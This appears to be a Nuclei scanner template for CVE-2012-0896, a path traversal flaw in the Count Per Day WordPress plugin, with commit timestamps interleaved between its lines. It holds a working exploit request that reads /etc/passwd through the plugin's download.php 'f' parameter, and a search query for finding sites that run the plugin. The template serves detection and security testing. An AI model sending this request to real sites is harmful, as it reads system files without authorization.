2021-10-01 11:02:42 +00:00
id : CVE-2012-0896
info :
name : Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access
author : daffainfo
2023-07-11 19:49:27 +00:00
severity : medium
2022-02-21 18:33:16 +00:00
description : An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.
2021-10-01 11:02:42 +00:00
reference :
- https://packetstormsecurity.com/files/108631/
2022-05-17 09:18:12 +00:00
- http://plugins.trac.wordpress.org/changeset/488883/count-per-day
2022-09-08 13:28:46 +00:00
- https://https://nvd.nist.gov/vuln/detail/CVE-2012-0896
2023-07-11 19:49:27 +00:00
- http://wordpress.org/extend/plugins/count-per-day/changelog/
2023-07-15 16:29:17 +00:00
- https://exchange.xforce.ibmcloud.com/vulnerabilities/72385
2022-02-21 18:33:16 +00:00
classification :
2022-09-06 01:33:31 +00:00
cvss-metrics : CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
2023-04-18 02:40:53 +00:00
cvss-score : 5
2022-02-21 18:33:16 +00:00
cve-id : CVE-2012-0896
2022-09-06 01:33:31 +00:00
cwe-id : CWE-22
2023-07-11 19:49:27 +00:00
epss-score : 0.02262
cpe : cpe:2.3:a:count_per_day_project:count_per_day:2.2:*:*:*:*:*:*:*
2022-07-11 17:26:59 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-07-11 17:26:59 +00:00
google-query : inurl:"/wp-content/plugins/count-per-day"
2023-07-11 19:49:27 +00:00
vendor : count_per_day_project
product : count_per_day
2022-08-27 04:41:18 +00:00
tags : packetstorm,cve,cve2012,lfi,wordpress,wp-plugin,traversal
2021-10-01 11:02:42 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-10-01 11:02:42 +00:00
- method : GET
path :
- "{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-10-01 11:02:42 +00:00
- type : status
status :
- 200